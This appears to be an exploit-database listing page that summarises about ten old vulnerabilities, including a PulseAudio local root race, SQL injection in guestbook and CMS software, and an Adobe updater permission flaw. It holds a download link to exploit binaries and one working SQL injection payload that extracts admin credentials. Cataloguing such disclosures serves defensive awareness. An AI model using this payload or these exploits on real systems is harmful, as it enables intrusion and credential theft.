PulseAudio setuid Local Privilege Escalation Vulnerability is a vulnerability discovered by Tavis Ormandy, Julien Tinnes and Yorick Koster. It allows an attacker to gain root privileges by exploiting a setuid binary in PulseAudio. The exploit was tested with success on Ubuntu 9.04 (x86-64) and Slackware 12.2.0 (x86). The exploit is available for download at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz).
This exploit is a race condition vulnerability in PulseAudio, which allows a local user to gain root privileges. The exploit works by creating a hard link to the PulseAudio binary, and then creating a second hard link to a malicious shell script. The exploit then forks a child process, which executes the PulseAudio binary. If the malicious shell script is executed before the PulseAudio binary, the user will gain root privileges.
This code will panic the FreeBSD kernel due to a bug in the PECOFF executable loader code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`). The panic seems to be caused in generic_bcopy due to a page fault, which may be exploitable. This exploit is only a DoS at the moment.
MCshoutbox 1.1 is vulnerable to SQL Injection Login Bypass, Cross-Site Scripting and Shell Upload. An attacker can exploit these vulnerabilities to bypass authentication, execute malicious scripts and upload malicious files.
MiniCWB version 2.3.0 is vulnerable to multiple remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the 'LANG' parameter of the vulnerable file. This can allow the attacker to execute arbitrary code on the vulnerable system.
A vulnerability in Netrix CMS 1.0 allows an attacker to bypass authentication and gain access to the administrative panel. This is done by sending a crafted HTTP request to cikkform.php with the parameter cid set to 1. This will allow the attacker to gain access to the administrative panel and edit anything or put on their own index.
Silentum Guestbook v2.0.2 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames, passwords, and emails. The vulnerable parameter is 'messageid' which can be manipulated to inject malicious SQL code. An example of the malicious code is 'silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/'.
EpicVJ 1.2.8.0 is vulnerable to a local heap overflow vulnerability when a specially crafted .mpl or .m3u file is opened. This can lead to arbitrary code execution.
Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x. The executable file is installed with improper permissions, with 'full control' for Builtin Users; a simple user can replace it with a binary of choice. At the next reboot it will run with SYSTEM privileges.
RadNICS Gold v5 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is located in the "fid" parameter of the "view_forum" module. An attacker can inject malicious SQL code to the "fid" parameter value in order to execute arbitrary SQL commands.
Services By CQR